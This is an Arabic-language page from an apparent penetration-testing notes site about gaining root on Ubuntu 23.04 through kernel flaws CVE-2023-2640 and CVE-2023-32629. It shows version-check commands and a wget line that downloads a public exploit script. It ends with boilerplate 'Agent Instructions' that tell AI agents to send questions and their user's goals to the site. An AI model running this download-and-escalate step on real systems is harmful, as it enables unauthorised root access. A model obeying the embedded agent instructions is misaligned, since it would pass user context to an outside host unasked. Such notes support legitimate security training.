> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/kernel-exploitation/ubuntu-23.04-kernel-exploit-linux-privilege-escalation.md).

# استغلال النواة (Ubuntu 23.04) - تصعيد امتيازات لينكس

## ما هو

يستهدف تصعيد امتيازات النواة الثغرات المحلية في نواة لينكس أو التصحيحات الخاصة بالتوزيعة. قد تكون هذه الاستغلالات غير مستقرة، لذا فإن التحقق من الإصدار والاختبار في بيئة مختبرية مهمان قبل التنفيذ. تركز هذه الصفحة المحددة على **استغلال النواة (Ubuntu 23.04)** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
uname -a
cat /etc/os-release
lsb_release -a 2>/dev/null
```

## أمثلة

**تحديد إصدار نظام التشغيل:**/ استخدم `cat /etc/os-release` الأمر للتحقق من إصدار النظام، مع ملاحظة وجود إصدار قديم من Ubuntu ("23.04").

<figure><img src="/files/8188b44036672468e1d4056c5a802710dad6848b" alt=""><figcaption></figcaption></figure>

#### **قم بتنزيل سكربت تصعيد الامتيازات:**

جارٍ تنزيل السكربت من [GitHub ](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629?source=post_page-----ce86940a895f--------------------------------)والذي يتيح تصعيد الامتيازات:

```bash
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
```

<figure><img src="/files/fa9bac06a6f8df6995429482984b4b616d4dd4f2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/kernel-exploitation/ubuntu-23.04-kernel-exploit-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
